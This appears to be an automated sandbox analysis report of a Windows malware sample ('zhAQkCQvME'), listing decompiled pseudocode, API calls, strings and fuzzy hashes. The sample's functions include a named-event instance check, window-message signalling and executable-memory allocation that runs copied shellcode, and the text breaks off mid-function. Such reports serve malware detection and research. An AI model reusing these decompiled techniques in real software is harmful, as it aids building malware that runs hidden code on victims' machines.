0x0040c8b5
0x0040c7fc
0x0040c7fc
0x0040c7ff
0x00000000
0x0040c889
0x0040c889
0x0040c88d
0x0040c892
0x0040c895
0x0040c897
0x0040c8a9
0x0040c8ad
0x0040c8b2
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c899
0x0040c899
0x0040c899
0x0040c89b
0x00000000
0x00000000
0x0040c89d
0x0040c8a2
0x00000000
0x0040c8a2
0x0040c887
0x00000000
0x0040c802
0x0040c755
0x0040c75b
0x0040c761
0x00000000
0x00000000
0x0040c763
0x0040c76a
0x0040c96f
0x0040c96f
0x0040c973
0x0040c9a3
0x0040c975
0x0040c987
0x0040c98c
0x00000000
0x0040c973
0x0040c770
0x0040c775
0x0040c778
0x00000000
0x00000000
0x00000000
0x0040c778
0x00000000

APIs

lstrlenW.KERNEL32(?), ref: 0040C81F

Strings

K@, xrefs: 0040C7D0
C:\Windows, xrefs: 0040C947
PATH, xrefs: 0040C7A1
powershell.exe, xrefs: 0040C846, 0040C864
"%s", xrefs: 0040C995
\"%s\", xrefs: 0040C979

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: lstrlen
String ID: "%s"$C:\Windows$K@$PATH$\"%s\"$powershell.exe
API String ID: 1659193697-1450701779
Opcode ID: d4943c6b550a12f8ea7142d8e31068e1a541ef2c5c7900e657ef85fd4901ab6c
Instruction ID: aec55c858c09bc23ef631479b3131d9779b2b7b89659da2ed43df7c849bdeede
Opcode Fuzzy Hash: d4943c6b550a12f8ea7142d8e31068e1a541ef2c5c7900e657ef85fd4901ab6c
Instruction Fuzzy Hash: 9871A4B5D00208EBDB14EF95E886BAE7774AB44305F14827BF501772C2D73CAA41CB5A

Uniqueness

Uniqueness Score: 100.00%

Function 00402470, Relevance: 10.6, APIs: 7, Instructions: 107
windowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00402470(void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _v8;
				signed int _t33;
				signed int _t44;
				signed int _t48;
				signed int _t51;

				_v8 = _a8;
				if(_v8 > 0x9151) {
					if(_v8 == 0x9153) {
						while(0 != 0) {
						}
						if(_a12 == 0x303baba && _a16 == 0xbaba0101) {
							_t51 =  *0x41f6d0; // 0x0
							 *0x41f6d0 = _t51 | 0x00000004;
							PostQuitMessage(0);
						}
						L33:
						return 0;
					}
					L32:
					return DefWindowProcA(_a4, _a8, _a12, _a16);
				}
				if(_v8 == 0x9151) {
					while(0 != 0) {
					}
					if(_a12 != 0x303baba) {
						L22:
						if(_a12 == 0x303baba && _a16 == 0xbaba0101) {
							_t33 =  *0x41f6d0; // 0x0
							 *0x41f6d0 = _t33 | 0x00000002;
							PostQuitMessage(0);
						}
						goto L33;
					}
					if(_a16 != 0xbaba0101) {
						if(_a16 != 0xbaba0002) {
							goto L22;
						}
						while(0 != 0) {
						}
						E00408FD0(0x31, "1");
						goto L22;
					}
					_t44 =  *0x41f6d0; // 0x0
					 *0x41f6d0 = _t44 | 0x00000002;
					PostQuitMessage(0);
					goto L22;
				}
				if(_v8 == 2) {
					while(0 != 0) {
					}
					return DefWindowProcA(_a4, _a8, _a12, _a16);
				}
				if(_v8 == 0x12) {
					while(0 != 0) {
					}
					_t48 =  *0x41f6d0; // 0x0
					 *0x41f6d0 = _t48 | 0x00000001;
					PostQuitMessage(0);
					return DefWindowProcA(_a4, _a8, _a12, _a16);
				}
				goto L32;
			}

0x00402477
0x00402481
0x004024a4
0x00402580
0x00402584
0x0040258d
0x00402598
0x004025a1
0x004025a9
0x004025a9
0x004025c9
0x00000000
0x004025c9
0x004025b1
0x00000000
0x004025c1
0x0040248a
0x00402508
0x0040250c
0x00402515
0x00402557
0x0040255e
0x00402569
0x00402571
0x00402578
0x00402578
0x00000000
0x0040257e
0x0040251e
0x00402540
0x00000000
0x00000000
0x00402542
0x00402546
0x0040254f
0x00000000
0x00402554
0x00402520
0x00402529
0x00402531
0x00000000
0x00402531
0x00402490
0x004024af
0x004024b3
0x00000000
0x004024c5
0x00402496
0x004024d0
0x004024d4
0x004024d6
0x004024df
0x004024e7
0x00000000
0x004024fd
0x00000000

APIs

DefWindowProcA.USER32(?,?,?,?), ref: 004024C5
PostQuitMessage.USER32(00000000), ref: 004024E7
DefWindowProcA.USER32(?,?,?,?), ref: 004024FD
PostQuitMessage.USER32(00000000), ref: 00402531
PostQuitMessage.USER32(00000000), ref: 00402578
DefWindowProcA.USER32(?,?,?,?), ref: 004025C1

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: MessagePostProcQuitWindow
String ID:
API String ID: 3873111417-0
Opcode ID: 992a050c0b90469a04a1ebfa2e9ef375cabef61c42d3a7e03be47830e73d43d5
Instruction ID: 633a7a137757f0fb497f08b1a3fe9026a8031b88f4083db8e642f37cd90c5b03
Opcode Fuzzy Hash: 992a050c0b90469a04a1ebfa2e9ef375cabef61c42d3a7e03be47830e73d43d5
Instruction Fuzzy Hash: AD415A70604209FFCB14CF54EE6E9AB33A5BB44301F10813BF816A62D4C7B89946EB5E

Uniqueness

Uniqueness Score: 2.71%

Function 00402920, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 100
synchronizationthreadUNIQUE

Download Yara Rule

C-Code - Quality: 56%

			E00402920(void* __ecx, void* __eflags) {
				long _v8;
				void* _v12;
				CHAR* _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _t24;
				long _t28;
				void* _t30;
				intOrPtr _t40;
				void* _t51;
				void* _t52;

				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_t24 = E00408FF0(__ecx, __eflags, 4);
				_t52 = _t51 + 4;
				_v28 = _t24;
				_t55 = _v28;
				if(_v28 == 0) {
					while(1) {
						L5:
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_v16 = E00409B00("zhAQkCQvME");
					__eflags = _v16;
					if(_v16 != 0) {
						_v12 = CreateEventA(0, 0, 0, _v16);
						__eflags = _v12;
						if(_v12 != 0) {
							_t28 = GetLastError();
							__eflags = _t28 - 0xb7;
							if(_t28 != 0xb7) {
								L16:
								_t30 = CreateThread(0, 0, E00401F20, 0, 0,  &_v24);
								__eflags = _t30;
								if(_t30 != 0) {
									_v8 = WaitForSingleObject(_v12, 0x3a98);
									__eflags = _v8;
									if(_v8 != 0) {
										__eflags = _v8 - 0x102;
										if(_v8 != 0x102) {
											while(1) {
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											L30:
											CloseHandle(_v12);
											return _v20;
										} else {
											goto L25;
										}
										while(1) {
											L25:
											__eflags = 0;
											if(0 == 0) {
												break;
											}
										}
										goto L30;
									} else {
										goto L21;
									}
									while(1) {
										L21:
										__eflags = 0;
										if(0 == 0) {
											break;
										}
									}
									_v20 = 1;
									goto L30;
								} else {
									goto L17;
								}
								while(1) {
									L17:
									__eflags = 0;
									if(0 == 0) {
										break;
									}
								}
								return 0;
							} else {
								goto L14;
							}
							while(1) {
								L14:
								__eflags = 0;
								if(0 == 0) {
									goto L16;
								}
							}
							goto L16;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						return 0;
					}
					return 0;
				}
				_t40 = E00403CF0(_t55, _v28);
				_t52 = _t52 + 4;
				_v32 = _t40;
				if(_v32 <= 0) {
					goto L5;
				}
				while(0 != 0) {
				}
				return 1;
			}

0x00402926
0x0040292d
0x00402934
0x0040293b
0x00402942
0x0040294b
0x00402950
0x00402953
0x00402956
0x0040295a
0x00402981
0x00402981
0x00402981
0x00402983
0x00000000
0x00000000
0x00402985
0x00402994
0x00402997
0x0040299b
0x004029b4
0x004029b7
0x004029bb
0x004029ca
0x004029d0
0x004029d5
0x004029dd
0x004029ee
0x004029f4
0x004029f6
0x00402a11
0x00402a14
0x00402a18
0x00402a29
0x00402a30
0x00402a3a
0x00402a3a
0x00402a3c
0x00000000
0x00000000
0x00402a3e
0x00402a40
0x00402a44
0x00000000
0x00000000
0x00000000
0x00000000
0x00402a32
0x00402a32
0x00402a32
0x00402a34
0x00000000
0x00000000
0x00402a36
0x00000000
0x00000000
0x00000000
0x00000000
0x00402a1a
0x00402a1a
0x00402a1a
0x00402a1c
0x00000000
0x00000000
0x00402a1e
0x00402a20
0x00000000
0x00000000
0x00000000
0x00000000
0x004029f8
0x004029f8
0x004029f8
0x004029fa
0x00000000
0x00000000
0x004029fc
0x00000000
0x00000000
0x00000000
0x00000000
0x004029d7
0x004029d7
0x004029d7
0x004029d9
0x00000000
0x00000000
0x004029db
0x00000000
0x00000000
0x00000000
0x00000000
0x004029bd
0x004029bd
0x004029bd
0x004029bf
0x00000000
0x00000000
0x004029c1
0x00000000
0x004029c3
0x00000000
0x0040299d
0x00402960
0x00402965
0x00402968
0x0040296f
0x00000000
0x00000000
0x00402971
0x00402975
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004029AE
GetLastError.KERNEL32 ref: 004029CA
CreateThread.KERNEL32(00000000,00000000,00401F20,00000000,00000000,00000000), ref: 004029EE
WaitForSingleObject.KERNEL32(00000000,00003A98), ref: 00402A0B
CloseHandle.KERNEL32(00000000), ref: 00402A44

Strings

zhAQkCQvME, xrefs: 00402987

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: Create$CloseErrorEventHandleLastObjectSingleThreadWait
String ID: zhAQkCQvME
API String ID: 3117531959-2550356889
Opcode ID: 28693f8a24e47561f6461d7a75f2b3a355c48caff18940598f7a2958a6cd3593
Instruction ID: 849a9250db044c7410f1ab2dc15f4e13a830a943582d35bbd5600db4a0667844
Opcode Fuzzy Hash: 28693f8a24e47561f6461d7a75f2b3a355c48caff18940598f7a2958a6cd3593
Instruction Fuzzy Hash: DB3130B1F04205EBDF209BA08A0D7BF7670AB54305F248477E506B62C1DBFC5A459F5A

Uniqueness

Uniqueness Score: 100.00%

Function 004016F0, Relevance: 10.6, APIs: 7, Instructions: 64
UNIQUE

Download Yara Rule

C-Code - Quality: 68%

			E004016F0(intOrPtr _a4) {
				int _v8;
				void _v47;
				char _v48;
				void* _v52;
				char _t16;

				_v52 = 0;
				_v8 = 0;
				_t16 =  *0x41f6d8; // 0x0
				_v48 = _t16;
				memset( &_v47, 0, 0x27);
				if( *((intOrPtr*)(_a4 + 8)) != GetCurrentProcessId()) {
					E00406FE0( &_v48, E004046E0(_a4 + 0x24, 0x5c),  *((intOrPtr*)(_a4 + 8)));
					_v52 = OpenEventA(2, 0,  &_v48);
					if(_v52 != 0) {
						if(SetEvent(_v52) != 0) {
							L7:
							CloseHandle(_v52);
							SleepEx(0x64, 1);
							return 1;
						}
						while(0 != 0) {
						}
						goto L7;
					}
					SleepEx(1, 1);
					return 1;
				}
				return 1;
			}

0x004016f6
0x004016fd
0x00401704
0x00401709
0x00401714
0x00401728
0x0040174e
0x00401764
0x0040176b
0x0040178a
0x00401792
0x00401796
0x004017a0
0x00000000
0x004017a6
0x0040178c
0x00401790
0x00000000
0x0040178c
0x00401771
0x00000000
0x00401777
0x00000000

APIs

memset.MSVCRT ref: 00401714
GetCurrentProcessId.KERNEL32 ref: 0040171C
OpenEventA.KERNEL32(00000002,00000000,?,?,?,?,?,?), ref: 0040175E
SleepEx.KERNEL32(00000001,00000001,?,?,?,?,?), ref: 00401771

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: CurrentEventOpenProcessSleepmemset
String ID:
API String ID: 4113282985-0
Opcode ID: e4edfd80fa3f4b23fa39a0cd04cab6775a878b2007f5bc6cac3f4f021754e415
Instruction ID: a6656b66057d4c7c724c4a09ecfba210e570c503e332d166bd28c96bcbc0ac51
Opcode Fuzzy Hash: e4edfd80fa3f4b23fa39a0cd04cab6775a878b2007f5bc6cac3f4f021754e415
Instruction Fuzzy Hash: FE215775E50204EFD7009BE0EC49FEE7B74AB48705F008139F905AB2D1E7B99545CBA5

Uniqueness

Uniqueness Score: 100.00%

Function 0040DB50, Relevance: 10.1, APIs: 8, Instructions: 145
memoryCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E0040DB50(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v8;
				long _v12;
				long _v16;
				void* _v20;
				long _v24;
				long _t54;
				void* _t58;
				long _t59;
				long _t75;
				intOrPtr _t77;

				_v12 = 0;
				_v20 = 0;
				_v8 = 0;
				_v16 = 0;
				while(0 != 0) {
				}
				__eflags =  *0x41f764 - 5;
				if( *0x41f764 != 5) {
					L9:
					_v20 = VirtualAlloc(0, 0x52, 0x3000, 0x40);
					__eflags = _v20;
					if(_v20 != 0) {
						_v8 = VirtualAlloc(0, 0x149, 0x3000, 0x40);
						__eflags = _v8;
						if(_v8 != 0) {
							memcpy(_v20, 0x41f2b8, 0x52);
							memcpy(_v8, 0x41f310, 0x129);
							_t54 = _v8 + 0x129;
							__eflags = _t54;
							_v16 = _t54;
							 *_v16 = _a4;
							 *((intOrPtr*)(_v16 + 8)) = _a8;
							 *((intOrPtr*)(_v16 + 0x10)) = _a12;
							 *(_v16 + 0x18) = 0;
							while(1) {
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							_t58 = _v20(_v8, _v16);
							__eflags = _t58;
							if(_t58 != 0) {
								_t59 = _v16;
								__eflags =  *((intOrPtr*)(_t59 + 0x18));
								if( *((intOrPtr*)(_t59 + 0x18)) != 0) {
									while(1) {
										__eflags = 0;
										if(0 == 0) {
											break;
										}
									}
									L30:
									__eflags = _v8;
									if(_v8 == 0) {
										L43:
										__eflags = _v20;
										if(_v20 != 0) {
											VirtualFree(_v20, 0, 0x4000);
										}
										while(1) {
											__eflags = 0;
											if(0 == 0) {
												break;
											}
										}
										return _v12;
									} else {
										goto L31;
									}
									while(1) {
										L31:
										__eflags = 0;
										if(0 == 0) {
											break;
										}
									}
									_t75 = _v16;
									__eflags =  *((intOrPtr*)(_t75 + 0x18));
									if( *((intOrPtr*)(_t75 + 0x18)) == 0) {
										L42:
										VirtualFree(_v8, 0, 0x4000);
										goto L43;
									}
									_v24 = _v16;
									__eflags =  *((intOrPtr*)(_v24 + 0x1c));
									if(__eflags > 0) {
										goto L42;
									}
									if(__eflags < 0) {
										while(1) {
											L37:
											__eflags = 0;
											if(0 == 0) {
												break;
											}
										}
										CloseHandle( *(_v16 + 0x18));
										while(1) {
											__eflags = 0;
											if(0 == 0) {
												goto L42;
											}
										}
										goto L42;
									}
									_t77 = _v24;
									__eflags =  *((intOrPtr*)(_t77 + 0x18)) - 0xffffffff;
									if( *((intOrPtr*)(_t77 + 0x18)) >= 0xffffffff) {
										goto L42;
									}
									goto L37;
								} else {
									goto L25;
								}
								while(1) {
									L25:
									__eflags = 0;
									if(0 == 0) {
										break;
									}
								}
								_v12 = 0xfffffffb;
								goto L30;
							} else {
								goto L21;
							}
							while(1) {
								L21:
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							_v12 = 0xfffffffc;
							goto L30;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_v12 = 0xfffffffd;
						goto L30;
					} else {
						goto L10;
					}
					while(1) {
						L10:
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_v12 = 0xfffffffe;
					goto L30;
				}
				__eflags =  *0x41f768 - 2;
				if( *0x41f768 != 2) {
					goto L9;
				}
				SetLastError(5);
				while(1) {
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				_v12 = 0xffffffff;
				goto L30;
			}

0x0040db56
0x0040db5d
0x0040db64
0x0040db6b
0x0040db72
0x0040db76
0x0040db78
0x0040db7f
0x0040dba4
0x0040dbb5
0x0040dbb8
0x0040dbbc
0x0040dbe4
0x0040dbe7
0x0040dbeb
0x0040dc0a
0x0040dc20
0x0040dc2b
0x0040dc2b
0x0040dc30
0x0040dc39
0x0040dc41
0x0040dc4a
0x0040dc50
0x0040dc57
0x0040dc57
0x0040dc59
0x00000000
0x00000000
0x0040dc5b
0x0040dc65
0x0040dc68
0x0040dc6a
0x0040dc7b
0x0040dc7e
0x0040dc82
0x0040dc93
0x0040dc93
0x0040dc95
0x00000000
0x00000000
0x0040dc97
0x0040dc99
0x0040dc99
0x0040dc9d
0x0040dcf2
0x0040dcf2
0x0040dcf6
0x0040dd03
0x0040dd03
0x0040dd09
0x0040dd09
0x0040dd0b
0x00000000
0x00000000
0x0040dd0d
0x0040dd15
0x00000000
0x00000000
0x00000000
0x0040dc9f
0x0040dc9f
0x0040dc9f
0x0040dca1
0x00000000
0x00000000
0x0040dca3
0x0040dca5
0x0040dca8
0x0040dcac
0x0040dce1
0x0040dcec
0x00000000
0x0040dcec
0x0040dcb1
0x0040dcb7
0x0040dcbb
0x00000000
0x00000000
0x0040dcbd
0x0040dcc8
0x0040dcc8
0x0040dcc8
0x0040dcca
0x00000000
0x00000000
0x0040dccc
0x0040dcd5
0x0040dcdb
0x0040dcdb
0x0040dcdd
0x00000000
0x00000000
0x0040dcdf
0x00000000
0x0040dcdb
0x0040dcbf
0x0040dcc2
0x0040dcc6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040dc84
0x0040dc84
0x0040dc84
0x0040dc86
0x00000000
0x00000000
0x0040dc88
0x0040dc8a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040dc6c
0x0040dc6c
0x0040dc6c
0x0040dc6e
0x00000000
0x00000000
0x0040dc70
0x0040dc72
0x00000000
0x00000000
0x00000000
0x00000000
0x0040dbed
0x0040dbed
0x0040dbed
0x0040dbef
0x00000000
0x00000000
0x0040dbf1
0x0040dbf3
0x00000000
0x00000000
0x00000000
0x00000000
0x0040dbbe
0x0040dbbe
0x0040dbbe
0x0040dbc0
0x00000000
0x00000000
0x0040dbc2
0x0040dbc4
0x00000000
0x0040dbc4
0x0040db81
0x0040db88
0x00000000
0x00000000
0x0040db8c
0x0040db92
0x0040db92
0x0040db94
0x00000000
0x00000000
0x0040db96
0x0040db98
0x00000000

APIs

SetLastError.KERNEL32(00000005), ref: 0040DB8C
VirtualAlloc.KERNEL32(00000000,00000052,00003000,00000040), ref: 0040DBAF
VirtualAlloc.KERNEL32(00000000,00000149,00003000,00000040), ref: 0040DBDE
memcpy.MSVCRT ref: 0040DC0A
memcpy.MSVCRT ref: 0040DC20
CloseHandle.KERNEL32(?), ref: 0040DCD5
VirtualFree.KERNEL32(00000000,00000000,00004000), ref: 0040DCEC
VirtualFree.KERNEL32(00000000,00000000,00004000), ref: 0040DD03

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: Virtual$AllocFreememcpy$CloseErrorHandleLast
String ID:
API String ID: 35398631-0
Opcode ID: 93720999ad878ebe0a6e0dade1063bd048713276f20b5331c92e9f73df3c50ad
Instruction ID: 9a446497a532c03b3da2d238db058146eeff52f62796beb4e5faebf96548faee
Opcode Fuzzy Hash: 93720999ad878ebe0a6e0dade1063bd048713276f20b5331c92e9f73df3c50ad
Instruction Fuzzy Hash: 32516F70E04204EBEB14CFE4C848BAEB771AB44314F24827BD5157A3D0C7B99A49DB49

Uniqueness

Uniqueness Score: 5.54%

Function 00411A20, Relevance: 8.9, APIs: 7, Instructions: 137
stringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00411A20(WCHAR** _a4, WCHAR* _a8, WCHAR* _a12) {
				signed int _v8;
				signed int _v12;
				WCHAR* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				WCHAR* _v32;
				signed int _v36;
				void* _t150;

				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v28 = 0;
				_v24 = 0;
				_v16 =  *_a4;
				_v28 = lstrlenW( *_a4) + 1;
				_v8 = lstrlenW(_a8);
				_v20 = lstrlenW(_a12);
				while(1) {
					_v16 = StrStrW(_v16, _a8);
					if(_v16 == 0) {
						break;
					}
					_v12 = _v12 + 1;
					_v16 =  &(_v16[_v8]);
				}
				if(_v12 != 0) {
					if(_v20 > _v8) {
						_v24 = (_v20 - _v8) * _v12 + _v28;
						E00403FC0(_a4, _a4, _v28 << 1, _v24 << 1);
						_t150 = _t150 + 0xc;
					}
					_v16 =  *_a4;
					while(1) {
						_v16 = StrStrW(_v16, _a8);
						if(_v16 == 0) {
							break;
						}
						E00404080(_v16,  &(_v16[_v20]),  &(_v16[_v8]), lstrlenW( &(_v16[_v8])) << 1);
						E00404040(_a12, _v16, _a12, _v20 << 1);
						_t150 = _t150 + 0x18;
						while(0 != 0) {
						}
						_v16 =  &(_v16[_v20]);
					}
					if(_v8 > _v20) {
						_v32 =  *_a4;
						_v36 = (_v8 - _v20) * _v12;
						E00404120( *_a4,  &(_v32[lstrlenW( *_a4) - _v36]), 0, _v36 << 1);
					}
					return  *_a4;
				}
				return 0;
			}

0x00411a26
0x00411a2d
0x00411a34
0x00411a3b
0x00411a42
0x00411a4e
0x00411a60
0x00411a6d
0x00411a7a
0x00411a7d
0x00411a8b
0x00411a92
0x00000000
0x00000000
0x00411a9a
0x00411aa6
0x00411aa6
0x00411aaf
0x00411abe
0x00411acd
0x00411ae0
0x00411ae5
0x00411ae5
0x00411aed
0x00411af0
0x00411afe
0x00411b05
0x00000000
0x00000000
0x00411b2e
0x00411b44
0x00411b49
0x00411b4c
0x00411b50
0x00411b5b
0x00411b5b
0x00411b66
0x00411b6d
0x00411b7a
0x00411b9b
0x00411ba0
0x00000000
0x00411ba6
0x00000000

APIs

lstrlenW.KERNEL32(00000000), ref: 00411A57
lstrlenW.KERNEL32(00000000), ref: 00411A67
lstrlenW.KERNEL32(00000000), ref: 00411A74
StrStrW.SHLWAPI(00000000,00000000), ref: 00411A85
StrStrW.SHLWAPI(00000000,00000000), ref: 00411AF8
lstrlenW.KERNEL32 ref: 00411B11
lstrlenW.KERNEL32(00000000,00000000,?), ref: 00411B8B

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: aa3e8b26580c0734ec7927dbcca2ec732e6c228d666d667cf36f3f6358790871
Instruction ID: 918acd9a6bc12449a8b02ea7ebf95441b4a792f70f9650b466f46e717905ffe8
Opcode Fuzzy Hash: aa3e8b26580c0734ec7927dbcca2ec732e6c228d666d667cf36f3f6358790871
Instruction Fuzzy Hash: 2051F6B4D00209EFCB04DF98D994AEEBBB5FF88304F108599E615AB390D735AA45CF94

Uniqueness

Uniqueness Score: 5.54%

Function 004021B0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 60libraryloaderUNIQUE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll), ref: 004021E5
GetProcAddress.KERNEL32(00000000,ChangeWindowMessageFilter), ref: 00402208
FreeLibrary.KERNEL32(00000000), ref: 00402264

Strings

ChangeWindowMessageFilter, xrefs: 004021FF
user32.dll, xrefs: 004021E0

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: ChangeWindowMessageFilter$user32.dll
API String ID: 145871493-2498399450
Opcode ID: 92586de880e2eb943aa72c1c171c35645916ce3689d901aa328675828794a1ec
Instruction ID: 685c5ddfaf2f4474e2f1e16a28c6d885207a2713187baa1b639765216545b880
Opcode Fuzzy Hash: 92586de880e2eb943aa72c1c171c35645916ce3689d901aa328675828794a1ec
Instruction Fuzzy Hash: EB210370904219DBCB10DFE0CA4C7EE7AB0BB88314F2085AED516762C0D7FD4A46EB59

Uniqueness

Uniqueness Score: 100.00%

Function 004018E0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39windowUNIQUE

Download Yara Rule

APIs

FindWindowA.USER32(zhAQkCQvME,zhAQkCQvME), ref: 004018FD
SendMessageA.USER32(00000000,00000012,00000000,00000000), ref: 0040191C
PostMessageA.USER32(0000FFFF,00000008,00000000,00000000), ref: 0040193E

Strings

R4@, xrefs: 00401918
zhAQkCQvME, xrefs: 004018F3, 004018F8

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: Message$FindPostSendWindow
String ID: R4@$zhAQkCQvME
API String ID: 443572216-2914093316
Opcode ID: 40e6f75b60c52ad8bf39f9c297620b0f1de471cd0f32deaa0b9248d96abefe17
Instruction ID: d87b9df40135fb8d9ba3950316689f8fd6b3e4f3097835fce18d85ace0212723
Opcode Fuzzy Hash: 40e6f75b60c52ad8bf39f9c297620b0f1de471cd0f32deaa0b9248d96abefe17
Instruction Fuzzy Hash: 71F0BBB5780304F7DB20ABB08C1AFBE76B0BB04701F308177E502B62E0D5B85646E61E

Uniqueness

Uniqueness Score: 100.00%

Function 00410510, Relevance: 7.6, APIs: 5, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00410510(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				WCHAR* _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				signed int _t40;
				signed int _t41;
				WCHAR* _t49;
				intOrPtr _t51;
				void* _t61;
				void* _t65;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				void* _t89;
				void* _t90;

				_t65 = __ecx;
				_v20 = 0;
				_v12 = 0;
				while(0 != 0) {
				}
				_t40 = E00403EE0(_t65, 0x2002);
				_t84 = _t83 + 4;
				_v24 = _t40;
				if(_v24 != 0) {
					_t41 = E00404A90(_a4);
					_t85 = _t84 + 4;
					_v28 = _t41;
					if(_v28 != 0) {
						E00411A20( &_v28, 0x4187f0, L"\\\\");
						_t86 = _t85 + 0xc;
						while(0 != 0) {
						}
						_v8 = E00407F40(0, 0x365);
						_push(_a8);
						_push(_v28);
						E00403B30(_v24, 0x1000, _v8, 0x72);
						E00408170( &_v8);
						_t89 = _t86 + 0x20;
						while(0 != 0) {
						}
						_t49 = E004106D0(0, _v24);
						_t90 = _t89 + 4;
						_v12 = _t49;
						if(_v12 != 0) {
							while(0 != 0) {
							}
							_t69 = _v12;
							_t51 = E00410460(_v12, _v12);
